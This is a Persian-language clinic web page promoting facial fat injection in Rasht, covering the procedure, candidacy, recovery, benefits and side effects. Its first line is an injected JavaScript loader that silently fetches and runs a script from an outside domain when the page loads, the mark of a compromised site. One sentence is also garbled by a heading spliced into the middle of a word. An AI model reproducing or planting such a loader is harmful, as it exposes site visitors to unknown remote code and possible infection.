;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); تزریق چربی به صورت
  • خانه
  • تزریق چربی به صورت و نکته های مهم
تزریق چربی صورت در رشت

تزریق چربی به صورت و نکته های مهم

تزریق چربی به صورت
تزریق چربی به صورت یکی از روش های مواثر و طبیعی جوان سازی چهره است.

کانتور و تعریف صورت توسط ژنتیک تعیین می شود، به همین دتزریق چربی به صورت و همه مواردی که باید بدانیملیل است که برخی چانه و گونه های برجسته دارند در حالی که برخی دیگر دارای صورت های گردتر هستند. راه هایی برای افزایش حجم صورت و بهبود ظاهر صورت با تزریق به چربی صورت وجود دارد، چه این موضوع مربوط به پیری باشد و چه صرفاً ساختار صورت.

آسپیراسیون چربی:

نزربق چربی به صورت اغلب به عنوان پیوند چربی شناخته می شود، و این یک روش جراحی با حداقل تهاجمی طبیعی برای تزریق چربی به صورت از ناحیه ای از بدن به صورت برای ترمیم حجم است. چربی با استفاده از تکنیک های مدرن لیپوساکشن به آرامی برداشته می شود و برای انتقال صورت آماده می شود. این یک ظاهر طبیعی ایجاد می کند و خطر ابتلا به عفونت یا دفع چربی بدن را کم می کند. نواحی متداول درمان شامل  گونه ها، فک ها و گودی زیر چشم است. تزریق صورت اغلب برای بهبود کانتور و حجم صورت در بیماران جوان‌تری که تمایل به برجسته‌تر شدن گونه‌ها یا چانه دارند، استفاده می‌شود.

تزریق چربی به صورت :

شرایط نامزدی متفاوتی برای هر روش برای بازگرداندن حجم صورت وجود دارد و هر نامزدی فردی در جلسه مشاوره ما ارزیابی می شود. نیاز اساسی برای اقدامات زیبایی این است که بیمار سالم باشد و انتظارات واقع بینانه داشته باشد. بیماران انتقال چربی صورت باید چربی کافی برای برداشت داشته باشند و قبل از انجام درمان باید وزن ثابتی داشته باشند.

تزریق  چربی به صورت و روش :

تزریق چربی یک روش نسبتاً ملایم است اما چندین مرحله برای این فرآیند وجود دارد. ابتدا از تکنیک های لیپوساکشن برای برداشتن چربی از بدن از پیش تعیین شده (شکم، باسن یا ران) استفاده می شود. این کار از طریق برش های ریز انجام می شود که تقریباً هیچ جای زخمی باقی نمی گذارد. سپس چربی بازیابی شده با حداقل دستکاری به آرامی برای تزریق آماده می شود. چربی با احتیاط به خطوط، توخالی ها و فرورفتگی های صورت با استفاده از کانول های ظریف (لوله ها) که از طریق برش های ریز قرار داده می شود، تزریق می شود تا جوان سازی و تغییر شکل دهد. گاهی اوقات، یک متخصص ممکن است مناطق تحت درمان را بیش از حد پر کند تا درصد سلول های چربی که زنده نمی مانند را جبران کند. تزریق صورت نسبتاً ساده است و شامل یک برش ساده در یک ناحیه مشخص تقریباً جایی است که چربی در آن قرار می گیرد.

بازیابی تزریق چربی صورت :

زمان بهبودی تزریق چربی از بیمار به بیمار دیگر متفاوت است. بهبود اولیه حدود چند هفته طول می کشد و پس از آن تورم به تدریج فروکش می کند و نتایج نهایی آشکار می شود. اگرچه دوره بهبودی برای انتقال چربی نسبتاً خفیف است، بیماران باید زمان کافی برای بهبودی مناسب بگذارند. بیماران باید در حدود شش ماه نتایج نهایی را ببینند در حالی که بهبودها باید چند روز پس از عمل آشکار شود. ریکاوری تزریق صورت نیز یک فرآیند نسبتاً ملایم است . ورزش باید برای چند هفته محدود شود. نتایج باید فوراً آشکار شوند، اما تورم با مشاهده فوری نتایج نهایی عمل تداخل خواهد داشت.

مزایای تزریق چربی به صورت عبارتند از:

  • نتایج ماندگارتر
  • ناحیه برداشتن چربی (شکم یا پهلو) ممکن است باریکتر به نظر برسد
  • سلول های بنیادی چربی می توانند فاکتورهای رشد را برای کیفیت بهتر بافت ایجاد کنند
  • زمان ریکاوری کم

عوارض تزریق چربی چیست؟

عوارض جانبی مورد انتظار:

  • کبودی و تورم قابل توجه
  • بی حسی موقت
  • اسکارهای کوچک (اینها محو می شوند، اما به طور کامل ناپدید نمی شوند)
  • از دست دادن مقداری چربی از ناحیه تزریق شده در چند ماه اول

تزریق چربی چگونه در جای خود باقی می ماند؟

معمولاً بیماران درخواست برداشتن چربی از شکم، پهلوها و ران ها می کنند. پس از پاکسازی و فرآوری چربی، مجدداً به ناحیه ای جداگانه  برای تقویت یا افزایش بافت تزریق می شود. پس از انتقال چربی، سلول های چربی برای همیشه در موقعیت جدید باقی می ماند.